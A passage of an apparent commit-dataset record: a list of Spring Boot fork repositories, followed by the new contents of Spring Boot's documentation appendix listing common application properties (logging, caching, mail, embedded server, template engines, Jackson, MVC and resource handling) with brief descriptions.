pring-boot,jvz\/spring-boot,philwebb\/spring-boot,shakuzen\/spring-boot,candrews\/spring-boot,javyzheng\/spring-boot,michael-simons\/spring-boot,shangyi0102\/spring-boot,drumonii\/spring-boot,pvorb\/spring-boot,bijukunjummen\/spring-boot,bbrouwer\/spring-boot,zhanhb\/spring-boot,javyzheng\/spring-boot,kdvolder\/spring-boot,yangdd1205\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,philwebb\/spring-boot-concourse,hello2009chen\/spring-boot,lburgazzoli\/spring-boot,bclozel\/spring-boot,shakuzen\/spring-boot,kdvolder\/spring-boot,deki\/spring-boot,joshthornhill\/spring-boot,chrylis\/spring-boot,habuma\/spring-boot,mbenson\/spring-boot,hqrt\/jenkins2-course-spring-boot,jbovet\/spring-boot,wilkinsona\/spring-boot,kdvolder\/spring-boot,hqrt\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,jmnarloch\/spring-boot,bbrouwer\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,lenicliu\/spring-boot,RichardCSantana\/spring-boot,jxblum\/spring-boot,izeye\/spring-boot,sbcoba\/spring-boot,deki\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,scottfrederick\/spring-boot,RichardCSantana\/spring-boot,olivergierke\/spring-boot,kdvolder\/spring-boot,ihoneymon\/spring-boot,jbovet\/spring-boot,jayarampradhan\/spring-boot,ollie314\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,shakuzen\/spring-boot,wilkinsona\/spring-boot,joshiste\/spring-boot,ilayaperumalg\/spring-boot,eddumelendez\/spring-boot,hello2009chen\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,shangyi0102\/spring-boot,ptahchiev\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,akmaharshi\/jenkins,bclozel\/spring-boot,tsachev\/spring-boot,neo4j-contrib\/spring-boot,royclarkson\/spring-boot,sebastiankirsch\/spring-boot,linead\/spring-boot,shangyi0102\/spring-boot,NetoDevel\/spring-boot,afroje-reshma\/spring-boot-sample,mosoft521\/spring-boot,lucassaldanha\/spring-boot,Buzzardo\/spring-boot,isopov\/spring-boot,DeezCashews\/spring-boot,aahlenst\/spring-boot,bjornlindstrom\/spring-boot,qerub\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,sebastiankirsch\/spring-boot,deki\/spring-boot,candrews\/spring-boot,minmay\/spring-boot,dreis2211\/spring-boot,chrylis\/spring-boot,spring-projects\/spring-boot,deki\/spring-boot,kamilszymanski\/spring-boot,bijukunjummen\/spring-boot,donhuvy\/spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,lucassaldanha\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,ptahchiev\/spring-boot,chrylis\/spring-boot,tsachev\/spring-boot,olivergierke\/spring-boot,yangdd1205\/spring-boot,NetoDevel\/spring-boot,DeezCashews\/spring-boot,izeye\/spring-boot,neo4j-contrib\/spring-boot,cleverjava\/jenkins2-course-spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,sbcoba\/spring-boot,bbrouwer\/spring-boot,wilkinsona\/spring-boot,SaravananParthasarathy\/SPSDemo,lenicliu\/spring-boot,neo4j-contrib\/spring-boot,philwebb\/spring-boot,DeezCashews\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,ihoneymon\/spring-boot,brettwooldridge\/spring-boot,kamilszymanski\/spring-boot,cleverjava\/jenkins2-course-spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,linead\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,mosoft521\/spring-boot,habuma\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,akmaharshi\/jenkins,Buzzardo\/spring-boot,ptahchiev\/spring-boot,mbogoevici\/spring-boot,lucassaldanha\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,zhanhb\/spring-boot,pvorb\/spring-boot,tiarebalbi\/spring-boot,zhanhb\/spring-boot,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,pvorb\/spring-boot,qerub\/spring-boot,Nowheresly\/spring-boot,bjornlindstrom\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,ollie314\/spring-boot,jxblum\/spring-boot,pvorb\/spring-boot,wilkinsona\/spring-boot,vakninr\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,zhanhb\/spring-boot,jmnarloch\/spring-boot,RichardCSantana\/spring-boot,tiarebalbi\/spring-boot,mosoft521\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,Buzzardo\/spring-boot,yhj630520\/spring-boot,Buzzardo\/spring-boot,bbrouwer\/spring-boot,herau\/spring-boot,SaravananParthasarathy\/SPSDemo,rweisleder\/spring-boot,akmaharshi\/jenkins,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,bijukunjummen\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,mbogoevici\/spring-boot,minmay\/spring-boot,vpavic\/spring-boot,i007422\/jenkins2-course-spring-boot,dreis2211\/spring-boot,herau\/spring-boot,vpavic\/spring-boot,javyzheng\/spring-boot,spring-projects\/spring-boot,thomasdarimont\/spring-boot,lucassaldanha\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,jayarampradhan\/spring-boot,cleverjava\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,vpavic\/spring-boot,xiaoleiPENG\/my-project,NetoDevel\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,dreis2211\/spring-boot,joshiste\/spring-boot,donhuvy\/spring-boot,brettwooldridge\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,jvz\/spring-boot,tiarebalbi\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,lenicliu\/spring-boot,minmay\/spring-boot,vpavic\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,olivergierke\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,joshthornhill\/spring-boot,vakninr\/spring-boot,xiaoleiPENG\/my-project,htynkn\/spring-boot,felipeg48\/spring-boot,donhuvy\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,Nowheresly\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,mdeinum\/spring-boot,ilayaperumalg\/spring-boot,vakninr\/spring-boot,sebastiankirsch\/spring-boot,hello2009chen\/spring-boot,sbcoba\/spring-boot,drumonii\/spring-boot,mdeinum\/spring-boot,akmaharshi\/jenkins,scottfrederick\/spring-boot,pvorb\/spring-boot,neo4j-contrib\/spring-boot,michael-simons\/spring-boot,SaravananParthasarathy\/SPSDemo,mevasaroj\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,royclarkson\/spring-boot,sebastiankirsch\/spring-boot,thomasdarimont\/spring-boot,lenicliu\/spring-boot,kdvolder\/spring-boot,qerub\/spring-boot,jayarampradhan\/spring-boot,donhuvy\/spring-boot,akmaharshi\/jenkins,donhuvy\/spring-boot,mdeinum\/spring-boot,ollie314\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# BANNER\n\tbanner.charset=UTF-8 # Banner file encoding.\n\tbanner.location=classpath:banner.txt # Banner file location.\n\n\t# LOGGING\n\tlogging.config= # Location of the logging configuration file. For instance `classpath:logback.xml` for Logback\n\tlogging.exception-conversion-word=%wEx # Conversion word used when logging exceptions.\n\tlogging.file= # Log file name. For instance `myapp.log`\n\tlogging.level.*= # Log levels severity mapping. For instance `logging.level.org.springframework=DEBUG`\n\tlogging.path= # Location of the log file. For instance `\/var\/log`\n\tlogging.pattern.console= # Appender pattern for output to the console. Only supported with the default logback setup.\n\tlogging.pattern.file= # Appender pattern for output to the file. Only supported with the default logback setup.\n\tlogging.pattern.level= # Appender pattern for log level (default %5p). Only supported with the default logback setup.\n\tlogging.register-shutdown-hook=false # Register a shutdown hook for the logging system when it is initialized.\n\n\t# AOP\n\tspring.aop.auto=true # Add @EnableAspectJAutoProxy.\n\tspring.aop.proxy-target-class=false # Whether subclass-based (CGLIB) proxies are to be created (true) as opposed to standard Java interface-based proxies (false).\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.index= # Application index.\n\tspring.application.name= # Application name.\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # Enable admin features for the application.\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean.\n\n\t# AUTO-CONFIGURATION\n\tspring.autoconfigure.exclude= # Auto-configuration classes to exclude.\n\n\t# SPRING CORE\n\tspring.beaninfo.ignore=true # Skip search of BeanInfo classes.\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.cache-names= # Comma-separated list of cache names to create if supported by the underlying cache manager.\n\tspring.cache.ehcache.config= # The location of the configuration file to use to initialize EhCache.\n\tspring.cache.guava.spec= # The spec to use to create caches. Check CacheBuilderSpec for more details on the spec format.\n\tspring.cache.hazelcast.config= # The location of the configuration file to use to initialize Hazelcast.\n\tspring.cache.infinispan.config= # The location of the configuration file to use to initialize Infinispan.\n\tspring.cache.jcache.config= # The location of the configuration file to use to initialize the cache manager.\n\tspring.cache.jcache.provider= # Fully qualified name of the CachingProvider implementation to use to retrieve the JSR-107 compliant cache manager. Only needed if more than one JSR-107 implementation is available on the classpath.\n\tspring.cache.type= # Cache type, auto-detected according to the environment by default.\n\n\t# SPRING CONFIG - using environment property only ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.location= # Config file locations.\n\tspring.config.name=application # Config file name.\n\n\t# HAZELCAST ({sc-spring-boot-autoconfigure}\/hazelcast\/HazelcastProperties.{sc-ext}[HazelcastProperties])\n\tspring.hazelcast.config= # The location of the configuration file to use to initialize Hazelcast.\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name.\n\tspring.jmx.enabled=true # Expose management beans to the JMX domain.\n\tspring.jmx.server=mbeanServer # MBeanServer bean name.\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.default-encoding=UTF-8 # Default MimeMessage encoding.\n\tspring.mail.host= # SMTP server host. For instance `smtp.example.com`\n\tspring.mail.jndi-name= # Session JNDI name. When set, takes precedence to others mail settings.\n\tspring.mail.password= # Login password of the SMTP server.\n\tspring.mail.port= # SMTP server port.\n\tspring.mail.properties.*= # Additional JavaMail session properties.\n\tspring.mail.protocol=smtp # Protocol used by the SMTP server.\n\tspring.mail.test-connection=false # Test that the mail server is available on startup.\n\tspring.mail.username= # Login user of the SMTP server.\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.banner-mode=console # Mode used to display the banner when the application runs.\n\tspring.main.sources= # Sources (class name, package name or XML resource location) to include in the ApplicationContext.\n\tspring.main.web-environment= # Run the application in a web environment (auto-detected by default).\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use.\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages # Comma-separated list of basenames, each following the ResourceBundle convention.\n\tspring.messages.cache-seconds=-1 # Loaded resource bundle files cache expiration, in seconds. When set to -1, bundles are cached forever.\n\tspring.messages.encoding=UTF-8 # Message bundles encoding.\n\tspring.messages.fallback-to-system-locale=true # Set whether to fall back to the system Locale if no files for a specific Locale have been found.\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (can be \"detect\", \"always\", \"never\").\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.fail-on-write-error= # Fail if ApplicationPidFileWriter is used but it cannot write the PID file.\n\tspring.pid.file= # Location of the PID file to write (if ApplicationPidFileWriter is used).\n\n\t# PROFILES\n\tspring.profiles.active= # Comma-separated list of <<howto-set-active-spring-profiles,active profiles>>.\n\tspring.profiles.include= # Unconditionally activate the specified comma separated profiles.\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.api-key= # SendGrid api key (alternative to username\/password)\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\n\t# ----------------------------------------\n\t# WEB PROPERTIES\n\t# ----------------------------------------\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true # Enable support of multi-part uploads.\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk. Values can use the suffixed \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size. Values can use the suffixed \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\tmultipart.max-request-size=10Mb # Max request size. Values can use the suffixed \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.address= # Network address to which the server should bind to.\n\tserver.compression.enabled=false # If response compression is enabled.\n\tserver.compression.excluded-user-agents= # List of user-agents to exclude from compression.\n\tserver.compression.mime-types= # Comma-separated list of MIME types that should be compressed. For instance `text\/html,text\/css,application\/json`\n\tserver.compression.min-response-size= # Minimum response size that is required for compression to be performed. For instance 2048\n\tserver.context-parameters.*= # Servlet context init parameters. For instance `server.context-parameters.a=alpha`\n\tserver.context-path= # Context path of the application.\n\tserver.display-name=application # Display name of the application.\n\tserver.error.include-stacktrace=never # When to include a \"stacktrace\" attribute.\n\tserver.error.path=\/error # Path of the error controller.\n\tserver.error.whitelabel.enabled=true # Enable the default error page displayed in browsers in case of a server error.\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet.\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.port=8080 # Server HTTP port.\n\tserver.server-header= # The value sent in the server response header (uses servlet container default if empty)\n\tserver.servlet-path=\/ # Path of the main dispatcher servlet.\n\tserver.session.cookie.comment= # Comment for the session cookie.\n\tserver.session.cookie.domain= # Domain for the session cookie.\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie.\n\tserver.session.cookie.max-age= # Maximum age of the session cookie in seconds.\n\tserver.session.cookie.name= # Session cookie name.\n\tserver.session.cookie.path= # Path of the session cookie.\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie.\n\tserver.session.persistent=false # Persist session data between restarts.\n\tserver.session.store-dir= # Directory used to store session data.\n\tserver.session.timeout= # Session timeout in seconds.\n\tserver.session.tracking-modes= # Session tracking modes (one or more of the following: \"cookie\", \"url\", \"ssl\").\n\tserver.ssl.ciphers= # Supported SSL ciphers.\n\tserver.ssl.client-auth= # Whether client authentication is wanted (\"want\") or needed (\"need\"). Requires a trust store.\n\tserver.ssl.enabled= #\n\tserver.ssl.key-alias= #\n\tserver.ssl.key-password= #\n\tserver.ssl.key-store= #\n\tserver.ssl.key-store-password= #\n\tserver.ssl.key-store-provider= #\n\tserver.ssl.key-store-type= #\n\tserver.ssl.protocol= #\n\tserver.ssl.trust-store= #\n\tserver.ssl.trust-store-password= #\n\tserver.ssl.trust-store-provider= #\n\tserver.ssl.trust-store-type= #\n\tserver.tomcat.accesslog.directory=logs # Directory in which log files are created. Can be relative to the tomcat base dir or absolute.\n\tserver.tomcat.accesslog.enabled=false # Enable access log.\n\tserver.tomcat.accesslog.pattern=common # Format pattern for access logs.\n\tserver.tomcat.accesslog.prefix=access_log # Log file name prefix.\n\tserver.tomcat.accesslog.suffix=.log # Log file name suffix.\n\tserver.tomcat.background-processor-delay=30 # Delay in seconds between the invocation of backgroundProcess methods.\n\tserver.tomcat.basedir= # Tomcat base directory. If not specified a temporary directory will be used.\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses.\n\tserver.tomcat.max-http-header-size=0 # Maximum size in bytes of the HTTP message header.\n\tserver.tomcat.max-threads=0 # Maximum amount of worker threads.\n\tserver.tomcat.port-header=X-Forwarded-Port # Name of the HTTP header used to override the original port value.\n\tserver.tomcat.protocol-header= # Header that holds the incoming protocol, usually named \"X-Forwarded-Proto\".\n\tserver.tomcat.protocol-header-https-value=https # Value of the protocol header that indicates that the incoming request uses SSL.\n\tserver.tomcat.remote-ip-header= # Name of the http header from which the remote ip is extracted. For instance `X-FORWARDED-FOR`\n\tserver.tomcat.uri-encoding=UTF-8 # Character encoding to use to decode the URI.\n\tserver.undertow.accesslog.dir= # Undertow access log directory.\n\tserver.undertow.accesslog.enabled=false # Enable access log.\n\tserver.undertow.accesslog.pattern=common # Format pattern for access logs.\n\tserver.undertow.buffer-size= # Size of each buffer in bytes.\n\tserver.undertow.buffers-per-region= # Number of buffer per region.\n\tserver.undertow.direct-buffers= # Allocate buffers outside the Java heap.\n\tserver.undertow.io-threads= # Number of I\/O threads to create for the worker.\n\tserver.undertow.worker-threads= # Number of worker threads.\n\tserver.use-forward-headers= # If X-Forwarded-* headers should be applied to the HttpRequest.\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.freemarker.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.freemarker.cache=false # Enable template caching.\n\tspring.freemarker.charset=UTF-8 # Template encoding.\n\tspring.freemarker.check-template-location=true # Check that the templates location exists.\n\tspring.freemarker.content-type=text\/html # Content-Type value.\n\tspring.freemarker.enabled=true # Enable MVC view resolution for this technology.\n\tspring.freemarker.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.freemarker.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.freemarker.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.freemarker.prefer-file-system-access=true # Prefer file system access for template loading. File system access enables hot detection of template changes.\n\tspring.freemarker.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.freemarker.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.freemarker.settings.*= # Well-known FreeMarker keys which will be passed to FreeMarker's Configuration.\n\tspring.freemarker.suffix= # Suffix that gets appended to view names when building a URL.\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # Comma-separated list of template paths.\n\tspring.freemarker.view-names= # White list of view names that can be resolved.\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.groovy.template.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.groovy.template.cache= # Enable template caching.\n\tspring.groovy.template.charset=UTF-8 # Template encoding.\n\tspring.groovy.template.check-template-location=true # Check that the templates location exists.\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=test\/html # Content-Type value.\n\tspring.groovy.template.enabled=true # Enable MVC view resolution for this technology.\n\tspring.groovy.template.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.groovy.template.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.groovy.template.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.groovy.template.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.groovy.template.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/ # Template path.\n\tspring.groovy.template.suffix=.tpl # Suffix that gets appended to view names when building a URL.\n\tspring.groovy.template.view-names= # White list of view names that can be resolved.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.use-hal-as-default-json-media-type=true # Specify if application\/hal+json responses should be sent to requests that accept application\/json.\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper=jackson # Preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # Charset of HTTP requests and responses. Added to the \"Content-Type\" header if not set explicitly.\n\tspring.http.encoding.enabled=true # Enable http encoding support.\n\tspring.http.encoding.force=true # Force the encoding to the configured charset on HTTP requests and responses.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string or a fully-qualified date format class name. For instance `yyyy-MM-dd HH:mm:ss`.\n\tspring.jackson.deserialization.*= # Jackson on\/off features that affect the way Java objects are deserialized.\n\tspring.jackson.generator.*= # Jackson on\/off features for generators.\n\tspring.jackson.joda-date-time-format= # Joda date time format string. If not configured, \"date-format\" will be used as a fallback if it is configured with a format string.\n\tspring.jackson.locale= # Locale used for formatting.\n\tspring.jackson.mapper.*= # Jackson general purpose on\/off features.\n\tspring.jackson.parser.*= # Jackson on\/off features for parsers.\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy. Can also be a fully-qualified class name of a PropertyNamingStrategy subclass.\n\tspring.jackson.serialization.*= # Jackson on\/off features that affect the way Java objects are serialized.\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization. Configured with one of the values in Jackson's JsonInclude.Include enumeration.\n\tspring.jackson.time-zone= # Time zone used when formatting dates. For instance `America\/Los_Angeles`\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.application-path= # Path that serves as the base URI for the application. Overrides the value of \"@ApplicationPath\" if specified.\n\tspring.jersey.filter.order=0 # Jersey filter chain order.\n\tspring.jersey.init.*= # Init parameters to pass to Jersey via the servlet or filter.\n\tspring.jersey.type=servlet # Jersey integration type. Can be either \"servlet\" or \"filter\".\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback=false # Enable support for fallback resolution.\n\tspring.mobile.devicedelegatingviewresolver.enabled=false # Enable device view resolver.\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/ # Prefix that gets prepended to view names for mobile devices.\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix= # Suffix that gets appended to view names for mobile devices.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix= # Prefix that gets prepended to view names for normal devices.\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix= # Suffix that gets appended to view names for normal devices.\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/ # Prefix that gets prepended to view names for tablet devices.\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix= # Suffix that gets appended to view names for tablet devices.\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # Enable SitePreferenceHandler.\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=false # Enable template caching.\n\tspring.mustache.charset=UTF-8 # Template encoding.\n\tspring.mustache.check-template-location=true # Check that the templates location exists.\n\tspring.mustache.content-type=text\/html # Content-Type value.\n\tspring.mustache.enabled=true # Enable MVC view resolution for this technology.\n\tspring.mustache.prefix=classpath:\/templates\/ # Prefix to apply to template names.\n\tspring.mustache.suffix=.html # Suffix to apply to template names.\n\tspring.mustache.view-names= # White list of view names that can be resolved.\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.async.request-timeout= # Amount of time (in milliseconds) before asynchronous request handling times out.\n\tspring.mvc.date-format= # Date format to use. For instance `dd\/MM\/yyyy`.\n\tspring.mvc.dispatch-trace-request=false # Dispatch TRACE requests to the FrameworkServlet doService method.\n\tspring.mvc.dispatch-options-request=false # Dispatch OPTIONS requests to the FrameworkServlet doService method.\n\tspring.mvc.favicon.enabled=true # Enable resolution of favicon.ico.\n\tspring.mvc.ignore-default-model-on-redirect=true # If the content of the \"default\" model should be ignored during redirect scenarios.\n\tspring.mvc.locale= # Locale to use.\n\tspring.mvc.media-types.*= # Maps file extensions to media types for content negotiation.\n\tspring.mvc.message-codes-resolver-format= # Formatting strategy for message codes. For instance `PREFIX_ERROR_CODE`.\n\tspring.mvc.static-path-pattern=\/** # Path pattern used for static resources.\n\tspring.mvc.throw-exception-if-no-handler-found=false # If a \"NoHandlerFoundException\" should be thrown if no Handler was found to process a request.\n\tspring.mvc.view.prefix= # Spring MVC view prefix.\n\tspring.mvc.view.suffix= # Spring MVC view suffix.\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.add-mappings=true # Enable default resource handling.\n\tspring.resources.cache-period= # Cache period for the resources served by the resource handler, in seconds.\n\tspring.resources.chain.cache=true # Enable caching in the Resource chain.\n\tspring.resources.chain.enabled= # Enable the Spring Resource Handling chain. Disabled by default unless at least one strategy has been enabled.\n\tspring.resources.chain.html-application-cache=false # Enable HTML5 application cache manifest rewriting.\n\tspring.resources.chain.strategy.content.enabled=false # Enable the content Version Strategy.\n\tspring.resources.chain.strategy.content.paths=\/** # Comma-separated list of patterns to apply to the Version Strategy.\n\tspring.resources.chain.strategy.fixed.enabled=false # Enable the fixed Version Strategy.\n\tspring.resources.chain.strategy.fixed.paths= # Comma-separated list of patterns to apply to the Version Strategy.\n\tspring.resources.chain.strategy.fixed.version= # Version string to use for the Version 